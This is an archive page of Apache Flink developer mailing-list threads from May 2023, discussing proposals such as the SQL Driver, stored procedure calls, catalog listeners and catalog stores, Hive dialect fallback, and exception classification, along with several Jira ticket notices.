Re: [DISCUSS] FLIP-316: Introduce SQL Driver

2023-05-31 Thread Weihua Hu
Thanks Paul for your reply.

SQLDriver looks good to me.

2. Do you mean a pass the SQL string a configuration or a program argument?


I brought this up because we were unable to pass the SQL file to Flink
using Kubernetes mode.
For DataStream/Python users, they need to prepare their images for the jars
and dependencies.
But for SQL users, they can use a common image to run different SQL queries
if there are no other udf requirements.
It would be great if the SQL query and image were not bound.

Using strings is a way to decouple these, but just as you mentioned, it's
not easy to pass complex SQL.

> use web submission
AFAIK, we can not use web submission in the Application mode. Please
correct me if I'm wrong.


Best,
Weihua


On Wed, May 31, 2023 at 9:37 PM Paul Lam  wrote:

> Hi Biao,
>
> Thanks for your comments!
>
> > 1. Scope: is this FLIP only targeted for non-interactive Flink SQL jobs
> in
> > Application mode? More specifically, if we use SQL client/gateway to
> > execute some interactive SQLs like a SELECT query, can we ask flink to
> use
> > Application mode to execute those queries after this FLIP?
>
> Thanks for pointing it out. I think only DMLs would be executed via SQL
> Driver.
> I'll add the scope to the FLIP.
>
> > 2. Deployment: I believe in YARN mode, the implementation is trivial as
> we
> > can ship files via YARN's tool easily but for K8s, things can be more
> > complicated as Shengkai said.
>
>
> Your input is very informative. I’m thinking about using web submission,
> but it requires exposing the JobManager port which could also be a problem
> on K8s.
>
> Another approach is to explicitly require a distributed storage to ship
> files,
> but we may need a new deployment executor for that.
>
> What do you think of these two approaches?
>
> > 3. Serialization of SessionState: in SessionState, there are some
> > unserializable fields
> > like org.apache.flink.table.resource.ResourceManager#userClassLoader. It
> > may be worthwhile to add more details about the serialization part.
>
> I agree. That’s a missing part. But if we use ExecNodeGraph as Shengkai
> mentioned, do we eliminate the need for serialization of SessionState?
>
> Best,
> Paul Lam
>
> > 2023年5月31日 13:07,Biao Geng  写道:
> >
> > Thanks Paul for the proposal!I believe it would be very useful for flink
> > users.
> > After reading the FLIP, I have some questions:
> > 1. Scope: is this FLIP only targeted for non-interactive Flink SQL jobs
> in
> > Application mode? More specifically, if we use SQL client/gateway to
> > execute some interactive SQLs like a SELECT query, can we ask flink to
> use
> > Application mode to execute those queries after this FLIP?
> > 2. Deployment: I believe in YARN mode, the implementation is trivial as
> we
> > can ship files via YARN's tool easily but for K8s, things can be more
> > complicated as Shengkai said. I have implemented a simple POC
> > <
> https://github.com/bgeng777/flink/commit/5b4338fe52ec343326927f0fc12f015dd22b1133
> >
> > based on SQL client before(i.e. consider the SQL client which supports
> > executing a SQL file as the SQL driver in this FLIP). One problem I have
> > met is how do we ship SQL files ( or Job Graph) to the k8s side. Without
> > such support, users have to modify the initContainer or rebuild a new K8s
> > image every time to fetch the SQL file. Like the flink k8s operator, one
> > workaround is to utilize the flink config(transforming the SQL file to a
> > escaped string like Weihua mentioned) which will be converted to a
> > ConfigMap but K8s has size limit of ConfigMaps(no larger than 1MB
> > ). Not
> sure
> > if we have better solutions.
> > 3. Serialization of SessionState: in SessionState, there are some
> > unserializable fields
> > like org.apache.flink.table.resource.ResourceManager#userClassLoader. It
> > may be worthwhile to add more details about the serialization part.
> >
> > Best,
> > Biao Geng
> >
> > Paul Lam  于2023年5月31日周三 11:49写道:
> >
> >> Hi Weihua,
> >>
> >> Thanks a lot for your input! Please see my comments inline.
> >>
> >>> - Is SQLRunner the better name? We use this to run a SQL Job. (Not
> >> strong,
> >>> the SQLDriver is fine for me)
> >>
> >> I’ve thought about SQL Runner but picked SQL Driver for the following
> >> reasons FYI:
> >>
> >> 1. I have a PythonDriver doing the same job for PyFlink [1]
> >> 2. Flink program's main class is sort of like Driver in JDBC which
> >> translates SQLs into
> >>databases specific languages.
> >>
> >> In general, I’m +1 for SQL Driver and +0 for SQL Runner.
> >>
> >>> - Could we run SQL jobs using SQL in strings? Otherwise, we need to
> >> prepare
> >>> a SQL file in an image for Kubernetes application mode, which may be a
> >> bit
> >>> cumbersome.
> >>
> >> Do you mean a pass the SQL string a configuration or a program argument?
> >>
> >> I thought it might be convenient for testing propose, but not
> recommended
> >> for 

Re: [DISCUSS] FLIP-311: Support Call Stored Procedure

2023-05-31 Thread Benchao Li
Thanks Yuxia for opening this discussion,

The general idea looks good to me, I only have one question about the
`ProcedureContext#getExecutionEnvironment`. Why are you proposing to return
a `StreamExecutionEnvironment` instead of `TableEnvironment`, could you
elaborate a little more on this?

Jingsong Li  于2023年5月30日周二 17:58写道:

> Thanks for your explanation.
>
> We can support Iterable in future. Current design looks good to me.
>
> Best,
> Jingsong
>
> On Tue, May 30, 2023 at 4:56 PM yuxia  wrote:
> >
> > Hi, Jingsong.
> > Thanks for your feedback.
> >
> > > Does this need to be a function call? Do you have some example?
> > I think it'll be useful to support function call when user call
> procedure.
> > The following example is from iceberg:[1]
> > CALL catalog_name.system.migrate('spark_catalog.db.sample', map('foo',
> 'bar'));
> >
> > It allows user to use `map('foo', 'bar')` to pass a map data to
> procedure.
> >
> > Another case that I can imagine may be rollback a table to the snapshot
> of one week ago.
> > Then, with function call, user may call `rollback(table_name, now() -
> INTERVAL '7' DAY)` to acheive such purpose.
> >
> > Although it can be function call, the eventual parameter got by the
> procedure will always be the literal evaluated.
> >
> >
> > > Procedure looks like a TableFunction, do you consider using Collector
> > something like TableFunction? (Supports large amount of data)
> >
> > Yes, I had considered it. But returns T[] is for simpility,
> >
> > First, regarding how to return the calling result of a procedure, it
> looks more intuitive to me to use the return result of the `call` method
> instead of by calling something like collector#collect.
> > Introduce a collector will increase necessary complexity.
> >
> > Second, regarding supporting large amount of data,  acoording my
> investagtion, I haven't seen the requirement that supports returning large
> amount of data.
> > Iceberg also return an array.[2] If you do think we should support large
> amount of data, I think we can change to return type from T[] to Iterable
> >
> > [1]: https://iceberg.apache.org/docs/latest/spark-procedures/#migrate
> > [2]:
> https://github.com/apache/iceberg/blob/601c5af9b6abded79dabeba177331310d5487f43/spark/v3.2/spark/src/main/java/org/apache/spark/sql/connector/iceberg/catalog/Procedure.java#L44
> >
> > Best regards,
> > Yuxia
> >
> > - 原始邮件 -
> > 发件人: "Jingsong Li" 
> > 收件人: "dev" 
> > 发送时间: 星期一, 2023年 5 月 29日 下午 2:42:04
> > 主题: Re: [DISCUSS] FLIP-311: Support Call Stored Procedure
> >
> > Thanks Yuxia for the proposal.
> >
> > > CALL [catalog_name.][database_name.]procedure_name ([ expression [,
> expression]* ] )
> >
> > The expression can be a function call. Does this need to be a function
> > call? Do you have some example?
> >
> > > Procedure returns T[]
> >
> > Procedure looks like a TableFunction, do you consider using Collector
> > something like TableFunction? (Supports large amount of data)
> >
> > Best,
> > Jingsong
> >
> > On Mon, May 29, 2023 at 2:33 PM yuxia 
> wrote:
> > >
> > > Hi, everyone.
> > >
> > > I’d like to start a discussion about FLIP-311: Support Call Stored
> Procedure [1]
> > >
> > > Stored procedure provides a convenient way to encapsulate complex
> logic to perform data manipulation or administrative tasks in external
> storage systems. It's widely used in traditional databases and popular
> compute engines like Trino for it's convenience. Therefore, we propose
> adding support for call stored procedure in Flink to enable better
> integration with external storage systems.
> > >
> > > With this FLIP, Flink will allow connector developers to develop their
> own built-in stored procedures, and then enables users to call these
> predefiend stored procedures.
> > >
> > > Looking forward to your feedbacks.
> > >
> > > [1]:
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-311%3A+Support+Call+Stored+Procedure
> > >
> > > Best regards,
> > > Yuxia
>


-- 

Best,
Benchao Li


[jira] [Created] (FLINK-32234) Support execute truncate table statement

2023-05-31 Thread luoyuxia (Jira)
luoyuxia created FLINK-32234:


 Summary: Support execute truncate table statement
 Key: FLINK-32234
 URL: https://issues.apache.org/jira/browse/FLINK-32234
 Project: Flink
  Issue Type: Sub-task
  Components: Table SQL / API, Table SQL / Planner
Reporter: luoyuxia






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32233) Introduce SupportsTruncate interface

2023-05-31 Thread luoyuxia (Jira)
luoyuxia created FLINK-32233:


 Summary: Introduce SupportsTruncate interface
 Key: FLINK-32233
 URL: https://issues.apache.org/jira/browse/FLINK-32233
 Project: Flink
  Issue Type: Sub-task
  Components: Table SQL / API
Reporter: luoyuxia






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32232) Supports parse support truncate table statement

2023-05-31 Thread luoyuxia (Jira)
luoyuxia created FLINK-32232:


 Summary: Supports parse support truncate table statement
 Key: FLINK-32232
 URL: https://issues.apache.org/jira/browse/FLINK-32232
 Project: Flink
  Issue Type: Sub-task
  Components: Table SQL / API
Reporter: luoyuxia






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSSION] Improved USER/SYSTEM exception wrapping in Flink code base

2023-05-31 Thread Paul Lam
Hi Hong,

Thanks for starting the discussion! I believe the exception classification 
between 
user exceptions and system exceptions has been long-awaited.

It's worth mentioning that years ago there was a related discussion [1], FYI.

I’m in favor of the heuristic approach to classify the exceptions by which 
classloader it comes from. In addition, we could introduce extra configurations 
to allow manual execution classification based on the package name of 
exceptions.

[1] https://lists.apache.org/thread/gms4nysnb3o4v2k6421m5hsq0g7gtr81

Best,
Paul Lam

> 2023年5月25日 23:07,Teoh, Hong  写道:
> 
> Hi all,
> 
> This discussion thread is to gauge community opinion and gather feedback on 
> implementing a better exception hierarchy in Flink to identify exceptions 
> that come from running “User job code” and exceptions coming from “Flink 
> engine code”.
> 
> Problem:
> Flink provides a distributed processing engine (SYSTEM) to run a data 
> streaming job (USER). There are many places in code where the engine runs 
> “user job provided java classes”, such as serialization/deserialization, 
> configuration objects, credential loading, running setup() method on certain 
> Operators.
> Sometimes when evaluating a stack trace, it might be hard to automatically 
> determine if an exception is arising out of a Flink engine problem, or a 
> problem associated to a particular job.
> 
> Proposed way forward:
> - It would be good to have an exception hierarchy maintained by Flink that 
> separates out the exceptions arising from running “USER provided classes”. 
> That way, we can improve our ability to automatically classify and mitigate 
> these exceptions.
> - We could also include separating out the places where exception originates 
> based on function - FlinkSerializationException, 
> FlinkConfigurationException.. etc. (we already have a similar concept with 
> IncompatibleKeysException)
> - This has synergy with FLIP-304: Pluggable Failure Enrichers (since it would 
> simplify the logic in the USER/SYSTEM classifier there) [1].
> - In addition, this has been discussed before in the context of updating the 
> exception thrown by serialisers to be a Flink-specific serialisation 
> exception instead of IllegalStateException [2]
> 
> 
> Any thoughts on the above?
> 
> Regards,
> Hong
> 
> 
> [1] 
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-304%3A+Pluggable+Failure+Enrichers
> [2] https://lists.apache.org/thread/0o859h1vdx6mwv0fqvmybpn574692jtg
> 
> 



Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread yuxia
Thanks for explanation. Make sense to me.

Best regards,
Yuxia

- 原始邮件 -
发件人: "Shammon FY" 
收件人: "dev" 
发送时间: 星期四, 2023年 6 月 01日 上午 10:45:12
主题: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

Thanks yuxia, you're right and I'll add the new database to
AlterDatabaseEvent.

I added `ignoreIfNotExists` for AlterDatabaseEvent because it is a
parameter in the `Catalog.alterDatabase` method. Although this value is
currently always false in `AlterDatabaseOperation`, I think it's better
to stay consistent with `Catalog.alterDatabase`. What do you think?

Best,
Shammon FY

On Thu, Jun 1, 2023 at 10:25 AM yuxia  wrote:

> Hi, Shammon.
> I mean do we need to contain the new database after alter in
> AlterDatabaseEvent?  So that the listener can know what has been modified
> for the database. Or the listener don't need to care about the actual
> modification.
> Also, I'm wondering whether AlterDatabaseEven need to include
> ignoreIfNotExists method since alter database operation don't have such
> syntax like 'alter database if exists xxx'.
>
> Best regards,
> Yuxia
>
> - 原始邮件 -
> 发件人: "Shammon FY" 
> 收件人: "dev" 
> 发送时间: 星期三, 2023年 5 月 31日 下午 2:55:26
> 主题: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
>
> Hi yuxia
>
> Thanks for your input. The `AlterDatabaseEvent` extends
> `DatabaseModificationEvent` which has the original database.
>
> Best,
> Shammon FY
>
> On Wed, May 31, 2023 at 2:24 PM yuxia  wrote:
>
> > Thanks Shammon for driving it.
> > The FLIP generally looks good to me. I only have one question.
> > WRT AlterDatabaseEvent, IIUC, it'll contain the origin database name and
> > the new CatalogDatabase after modified. Is it enough only pass the origin
> > database name? Will it be better to contain the origin CatalogDatabase so
> > that listener have ways to know what changes?
> >
> > Best regards,
> > Yuxia
> >
> > - 原始邮件 -
> > 发件人: "ron9 liu" 
> > 收件人: "dev" 
> > 发送时间: 星期三, 2023年 5 月 31日 上午 11:36:04
> > 主题: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
> >
> > Hi, Shammon
> >
> > Thanks for driving this FLIP, It will enforce the Flink metadata
> capability
> > from the platform produce perspective. The overall design looks good to
> me,
> > I just have some small question:
> > 1. Regarding CatalogModificationListenerFactory#createListener method, I
> > think it would be better to pass Context as its parameter instead of two
> > specific Object. In this way, we can easily extend it in the future and
> > there will be no compatibility problems. Refer to
> >
> >
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> > 2. In FLIP, you mentioned that multiple Flink tables may refer to the
> same
> > physical table, so does the Listener report this physical table
> repeatedly?
> > 3. When registering a Listener object, will it connect to an external
> > system such as Datahub? If the Listener object registration times out due
> > to permission issues, it will affect the execution of all subsequent SQL,
> > what should we do in this case?
> >
> > Best,
> > Ron
> >
> > Shammon FY  于2023年5月31日周三 08:53写道:
> >
> > > Thanks Feng, the catalog modification listener is only used to report
> > > read-only ddl information to other components or systems.
> > >
> > > > 1. Will an exception thrown by the listener affect the normal
> execution
> > > process?
> > >
> > > Users need to handle the exception in the listener themselves. Many
> DDLs
> > > such as drop tables and alter tables cannot be rolled back, Flink
> cannot
> > > handle these exceptions for the listener. It will cause the operation
> to
> > > exit if an exception is thrown, but the executed DDL will be
> successful.
> > >
> > > > 2. What is the order of execution? Is the listener executed first or
> > are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification(such as integrating with Ranger based on the listener) ,
> is
> > > that possible?
> > >
> > > The listener will be notified to report catalog modification after DDLs
> > are
> > > successful, so you can not do permission verification for DDL in the
> > > listener. As mentioned above, Flink will not roll back the DDL even
> when
> > > the listener throws an exception. I think permission verification is
> > > another issue and can be discussed separately.
> > >
> > >
> > > Best,
> > > Shammon FY
> > >
> > > On Tue, May 30, 2023 at 1:07 AM Feng Jin 
> wrote:
> > >
> > > > Hi, Shammon
> > > >
> > > > Thanks for driving this Flip, [Support Customized Job Meta Data
> > Listener]
> > > > will  make it easier for Flink to collect lineage information.
> > > > I fully agree with the overall solution and have a small question:
> > > >
> > > > 1. Will an exception thrown by the listener affect the normal
> execution
> > > > process?
> > > >
> > > > 2. What is 

Re: [DISCUSS] Hive dialect shouldn't fall back to Flink's default dialect

2023-05-31 Thread yuxia
Hi, Jingsong. It's hard to provide an option regarding to the fact that we also 
want to decouple Hive with flink planner. 
If we still need this fall back behavior, we will still depend on `ParserImpl` 
provided by flink-table-planner  on HiveParser.
But to try best to minimize the impact to users and more user-friendly, I'll 
remind users may use set table.sql-dialect = default to switch to Flink's 
default dialect in error message when fail to parse the sql in HiveParser.

Best regards,
Yuxia

Best regards,
Yuxia

- 原始邮件 -
发件人: "Jingsong Li" 
收件人: "Rui Li" 
抄送: "dev" , "yuxia" , "User" 

发送时间: 星期二, 2023年 5 月 30日 下午 3:21:56
主题: Re: [DISCUSS] Hive dialect shouldn't fall back to Flink's default dialect

+1, the fallback looks weird now, it is outdated.

But, it is good to provide an option. I don't know if there are some
users who depend on this fallback.

Best,
Jingsong

On Tue, May 30, 2023 at 1:47 PM Rui Li  wrote:
>
> +1, the fallback was just intended as a temporary workaround to run 
> catalog/module related statements with hive dialect.
>
> On Mon, May 29, 2023 at 3:59 PM Benchao Li  wrote:
>>
>> Big +1 on this, thanks yuxia for driving this!
>>
>> yuxia  于2023年5月29日周一 14:55写道:
>>
>> > Hi, community.
>> >
>> > I want to start the discussion about Hive dialect shouldn't fall back to
>> > Flink's default dialect.
>> >
>> > Currently, when the HiveParser fail to parse the sql in Hive dialect,
>> > it'll fall back to Flink's default parser[1] to handle flink-specific
>> > statements like "CREATE CATALOG xx with (xx);".
>> >
>> > As I‘m involving with Hive dialect and have some communication with
>> > community users who use Hive dialectrecently,  I'm thinking throw exception
>> > directly instead of falling back to Flink's default dialect when fail to
>> > parse the sql in Hive dialect
>> >
>> > Here're some reasons:
>> >
>> > First of all, it'll hide some error with Hive dialect. For example, we
>> > found we can't use Hive dialect any more with Flink sql client in release
>> > validation phase[2], finally we find a modification in Flink sql client
>> > cause it, but our test case can't find it earlier for although HiveParser
>> > faill to parse it but then it'll fall back to default parser and pass test
>> > case successfully.
>> >
>> > Second, conceptually, Hive dialect should be do nothing with Flink's
>> > default dialect. They are two totally different dialect. If we do need a
>> > dialect mixing Hive dialect and default dialect , may be we need to propose
>> > a new hybrid dialect and announce the hybrid behavior to users.
>> > Also, It made some users confused for the fallback behavior. The fact
>> > comes from I had been ask by community users. Throw an excpetioin directly
>> > when fail to parse the sql statement in Hive dialect will be more 
>> > intuitive.
>> >
>> > Last but not least, it's import to decouple Hive with Flink planner[3]
>> > before we can externalize Hive connector[4]. If we still fall back to Flink
>> > default dialct, then we will need depend on `ParserImpl` in Flink planner,
>> > which will block us removing the provided dependency of Hive dialect as
>> > well as externalizing Hive connector.
>> >
>> > Although we hadn't announced the fall back behavior ever, but some users
>> > may implicitly depend on this behavior in theirs sql jobs. So, I hereby
>> > open the dicussion about abandoning the fall back behavior to make Hive
>> > dialect clear and isoloted.
>> > Please remember it won't break the Hive synatax but the syntax specified
>> > to Flink may fail after then. But for the failed sql, you can use `SET
>> > table.sql-dialect=default;` to switch to Flink dialect.
>> > If there's some flink-specific statements we found should be included in
>> > Hive dialect to be easy to use, I think we can still add them as specific
>> > cases to Hive dialect.
>> >
>> > Look forwards to your feedback. I'd love to listen the feedback from
>> > community to take the next steps.
>> >
>> > [1]:
>> > https://github.com/apache/flink/blob/678370b18e1b6c4a23e5ce08f8efd05675a0cc17/flink-connectors/flink-connector-hive/src/main/java/org/apache/flink/table/planner/delegation/hive/HiveParser.java#L348
>> > [2]:https://issues.apache.org/jira/browse/FLINK-26681
>> > [3]:https://issues.apache.org/jira/browse/FLINK-31413
>> > [4]:https://issues.apache.org/jira/browse/FLINK-30064
>> >
>> >
>> >
>> > Best regards,
>> > Yuxia
>> >
>>
>>
>> --
>>
>> Best,
>> Benchao Li
>
>
>
> --
> Best regards!
> Rui Li


Re: [DISCUSS] FLIP 295: Support persistence of Catalog configuration and asynchronous registration

2023-05-31 Thread Feng Jin
Hi ,  thanks all for reviewing the flip.

@Ron

>  Regarding the CatalogStoreFactory#createCatalogStore method, do we need
to provide a default implementation?

Yes, we will provide a default InMemoryCatalogStoreFactory to create an
InMemoryCatalogStore.

>  If we get a Catalog from CatalogStore, after initializing it, whether we
put it in Map catalogs again?

Yes, in the current design, catalogs are stored as snapshots, and once
initialized, the Catalog will be placed in the Map
catalogs.
Subsequently, the Map catalogs will be the primary source
for obtaining the corresponding Catalog.

>   how about renaming them to `catalog.store.type` and
`catalog.store.path`?

I think it is okay. Adding "sql" at the beginning may seem a bit strange. I
will update the FLIP.



@Shammon

Thank you for the review. I have made the necessary corrections.
Regarding the modifications made to the Public Interface, I have also
included the relevant changes to the `TableEnvironment`.


Best,
Feng


On Wed, May 31, 2023 at 5:02 PM Shammon FY  wrote:

> Hi feng,
>
> Thanks for updating, I have some minor comments
>
> 1. The modification of `CatalogManager` should not be in `Public
> Interfaces`, it is not a public interface.
>
> 2. `@PublicEvolving` should be added for `CatalogStore` and
> `CatalogStoreFactory`
>
> 3. The code `Optional optionalDescriptor =
> catalogStore.get(catalogName);` in the `CatalogManager` should be
> `Optional optionalDescriptor =
> catalogStore.get(catalogName);`
>
> Best,
> Shammon FY
>
>
> On Wed, May 31, 2023 at 2:24 PM liu ron  wrote:
>
> > Hi, Feng
> >
> > Thanks for driving this FLIP, this proposal is very useful for catalog
> > management.
> > I have some small questions:
> >
> > 1. Regarding the CatalogStoreFactory#createCatalogStore method, do we
> need
> > to provide a default implementation?
> > 2. If we get Catalog from CatalogStore, after initializing it, whether we
> > put it to Map catalogs again?
> > 3. Regarding the options `sql.catalog.store.type` and
> > `sql.catalog.store.file.path`, how about renaming them to
> > `catalog.store.type` and `catalog.store.path`?
> >
> > Best,
> > Ron
> >
> > Feng Jin  于2023年5月29日周一 21:19写道:
> >
> > > Hi yuxia
> > >
> > >  > But from the code in Proposed Changes, once we register the Catalog,
> > we
> > > initialize it and open it. right?
> > >
> > > Yes, In order to avoid inconsistent semantics of the original CREATE
> > > CATALOG DDL, Catalog will be directly initialized in registerCatalog so
> > > that parameter validation can be performed.
> > >
> > > In the current design, lazy initialization is mainly reflected in
> > > getCatalog. If CatalogStore has already saved some catalog
> > configurations,
> > > only initialization is required in getCatalog.
> > >
> > >
> > > Best,
> > > Feng
> > >
> > > On Mon, May 29, 2023 at 8:27 PM yuxia 
> > wrote:
> > >
> > > > Hi, Feng.
> > > > I'm trying to understanding the meaning of *lazy initialization*. If
> > i'm
> > > > wrong, please correct me.
> > > >
> > > > IIUC, lazy initialization means only you need to access the catalog,
> > then
> > > > you initialize it. But from the code in Proposed Changes, once we
> > > register
> > > > the Catalog,
> > > > we initialize it and open it. right?
> > > >
> > > > Best regards,
> > > > Yuxia
> > > >
> > > > - 原始邮件 -
> > > > 发件人: "Jing Ge" 
> > > > 收件人: "dev" 
> > > > 发送时间: 星期一, 2023年 5 月 29日 下午 5:12:46
> > > > 主题: Re: [DISCUSS] FLIP 295: Support persistence of Catalog
> > configuration
> > > > and asynchronous registration
> > > >
> > > > Hi Feng,
> > > >
> > > > Thanks for your effort! +1 for the proposal.
> > > >
> > > > One of the major changes is that current design will provide
> > > > Map catalogs as a snapshot instead of a cache, which
> > > means
> > > > once it has been initialized, any changes done by other sessions will
> > not
> > > > affect it. Point 6 described follow-up options for further
> improvement.
> > > >
> > > > Best regards,
> > > > Jing
> > > >
> > > > On Mon, May 29, 2023 at 5:31 AM Feng Jin 
> > wrote:
> > > >
> > > > > Hi all, I would like to update you on the latest progress of the
> > FLIP.
> > > > >
> > > > >
> > > > > Last week, Leonard Xu, HangRuan, Jing Ge, Shammon FY, ShengKai Fang
> > > and I
> > > > > had an offline discussion regarding the overall solution for Flink
> > > > > CatalogStore. We have reached a consensus and I have updated the
> > final
> > > > > solution in FLIP.
> > > > >
> > > > > Next, let me briefly describe the entire design:
> > > > >
> > > > >1.
> > > > >
> > > > >Introduce CatalogDescriptor to store catalog configuration
> similar
> > > to
> > > > >TableDescriptor.
> > > > >2.
> > > > >
> > > > >The two key functions of CatalogStore - void storeCatalog(String
> > > > >catalogName, CatalogDescriptor) and CatalogDescriptor
> > > > getCatalog(String)
> > > > >will both use CatalogDescriptor instead of Catalog instance.
> This
> > > way,
> > > > >CatalogStore will only be 

Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread Shammon FY
Thanks yuxia, you're right and I'll add the new database to
AlterDatabaseEvent.

I added `ignoreIfNotExists` for AlterDatabaseEvent because it is a
parameter in the `Catalog.alterDatabase` method. Although this value is
currently always false in `AlterDatabaseOperation`, I think it's better
to stay consistent with `Catalog.alterDatabase`. What do you think?

Best,
Shammon FY

On Thu, Jun 1, 2023 at 10:25 AM yuxia  wrote:

> Hi, Shammon.
> I mean do we need to contain the new database after alter in
> AlterDatabaseEvent?  So that the listener can know what has been modified
> for the database. Or the listener don't need to care about the actual
> modification.
> Also, I'm wondering whether AlterDatabaseEven need to include
> ignoreIfNotExists method since alter database operation don't have such
> syntax like 'alter database if exists xxx'.
>
> Best regards,
> Yuxia
>
> - 原始邮件 -
> 发件人: "Shammon FY" 
> 收件人: "dev" 
> 发送时间: 星期三, 2023年 5 月 31日 下午 2:55:26
> 主题: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
>
> Hi yuxia
>
> Thanks for your input. The `AlterDatabaseEvent` extends
> `DatabaseModificationEvent` which has the original database.
>
> Best,
> Shammon FY
>
> On Wed, May 31, 2023 at 2:24 PM yuxia  wrote:
>
> > Thanks Shammon for driving it.
> > The FLIP generally looks good to me. I only have one question.
> > WRT AlterDatabaseEvent, IIUC, it'll contain the origin database name and
> > the new CatalogDatabase after modified. Is it enough only pass the origin
> > database name? Will it be better to contain the origin CatalogDatabase so
> > that listener have ways to know what changes?
> >
> > Best regards,
> > Yuxia
> >
> > - 原始邮件 -
> > 发件人: "ron9 liu" 
> > 收件人: "dev" 
> > 发送时间: 星期三, 2023年 5 月 31日 上午 11:36:04
> > 主题: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
> >
> > Hi, Shammon
> >
> > Thanks for driving this FLIP, It will enforce the Flink metadata
> capability
> > from the platform produce perspective. The overall design looks good to
> me,
> > I just have some small question:
> > 1. Regarding CatalogModificationListenerFactory#createListener method, I
> > think it would be better to pass Context as its parameter instead of two
> > specific Object. In this way, we can easily extend it in the future and
> > there will be no compatibility problems. Refer to
> >
> >
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> > 2. In FLIP, you mentioned that multiple Flink tables may refer to the
> same
> > physical table, so does the Listener report this physical table
> repeatedly?
> > 3. When registering a Listener object, will it connect to an external
> > system such as Datahub? If the Listener object registration times out due
> > to permission issues, it will affect the execution of all subsequent SQL,
> > what should we do in this case?
> >
> > Best,
> > Ron
> >
> > Shammon FY  于2023年5月31日周三 08:53写道:
> >
> > > Thanks Feng, the catalog modification listener is only used to report
> > > read-only ddl information to other components or systems.
> > >
> > > > 1. Will an exception thrown by the listener affect the normal
> execution
> > > process?
> > >
> > > Users need to handle the exception in the listener themselves. Many
> DDLs
> > > such as drop tables and alter tables cannot be rolled back, Flink
> cannot
> > > handle these exceptions for the listener. It will cause the operation
> to
> > > exit if an exception is thrown, but the executed DDL will be
> successful.
> > >
> > > > 2. What is the order of execution? Is the listener executed first or
> > are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification(such as integrating with Ranger based on the listener) ,
> is
> > > that possible?
> > >
> > > The listener will be notified to report catalog modification after DDLs
> > are
> > > successful, so you can not do permission verification for DDL in the
> > > listener. As mentioned above, Flink will not roll back the DDL even
> when
> > > the listener throws an exception. I think permission verification is
> > > another issue and can be discussed separately.
> > >
> > >
> > > Best,
> > > Shammon FY
> > >
> > > On Tue, May 30, 2023 at 1:07 AM Feng Jin 
> wrote:
> > >
> > > > Hi, Shammon
> > > >
> > > > Thanks for driving this Flip, [Support Customized Job Meta Data
> > Listener]
> > > > will  make it easier for Flink to collect lineage information.
> > > > I fully agree with the overall solution and have a small question:
> > > >
> > > > 1. Will an exception thrown by the listener affect the normal
> execution
> > > > process?
> > > >
> > > > 2. What is the order of execution? Is the listener executed first or
> > are
> > > > specific operations executed first?  If I want to perform DDL
> > permission
> > > > verification(such as integrating with Ranger based on the 

Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread yuxia
Hi, Shammon.
I mean do we need to contain the new database after alter in 
AlterDatabaseEvent?  So that the listener can know what has been modified for 
the database. Or the listener don't need to care about the actual modification.
Also, I'm wondering whether AlterDatabaseEven need to include ignoreIfNotExists 
method since alter database operation don't have such syntax like 'alter 
database if exists xxx'.

Best regards,
Yuxia

- 原始邮件 -
发件人: "Shammon FY" 
收件人: "dev" 
发送时间: 星期三, 2023年 5 月 31日 下午 2:55:26
主题: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

Hi yuxia

Thanks for your input. The `AlterDatabaseEvent` extends
`DatabaseModificationEvent` which has the original database.

Best,
Shammon FY

On Wed, May 31, 2023 at 2:24 PM yuxia  wrote:

> Thanks Shammon for driving it.
> The FLIP generally looks good to me. I only have one question.
> WRT AlterDatabaseEvent, IIUC, it'll contain the origin database name and
> the new CatalogDatabase after modified. Is it enough only pass the origin
> database name? Will it be better to contain the origin CatalogDatabase so
> that listener have ways to know what changes?
>
> Best regards,
> Yuxia
>
> - 原始邮件 -
> 发件人: "ron9 liu" 
> 收件人: "dev" 
> 发送时间: 星期三, 2023年 5 月 31日 上午 11:36:04
> 主题: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
>
> Hi, Shammon
>
> Thanks for driving this FLIP, It will enforce the Flink metadata capability
> from the platform produce perspective. The overall design looks good to me,
> I just have some small question:
> 1. Regarding CatalogModificationListenerFactory#createListener method, I
> think it would be better to pass Context as its parameter instead of two
> specific Object. In this way, we can easily extend it in the future and
> there will be no compatibility problems. Refer to
>
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> 2. In FLIP, you mentioned that multiple Flink tables may refer to the same
> physical table, so does the Listener report this physical table repeatedly?
> 3. When registering a Listener object, will it connect to an external
> system such as Datahub? If the Listener object registration times out due
> to permission issues, it will affect the execution of all subsequent SQL,
> what should we do in this case?
>
> Best,
> Ron
>
> Shammon FY  于2023年5月31日周三 08:53写道:
>
> > Thanks Feng, the catalog modification listener is only used to report
> > read-only ddl information to other components or systems.
> >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > process?
> >
> > Users need to handle the exception in the listener themselves. Many DDLs
> > such as drop tables and alter tables cannot be rolled back, Flink cannot
> > handle these exceptions for the listener. It will cause the operation to
> > exit if an exception is thrown, but the executed DDL will be successful.
> >
> > > 2. What is the order of execution? Is the listener executed first or
> are
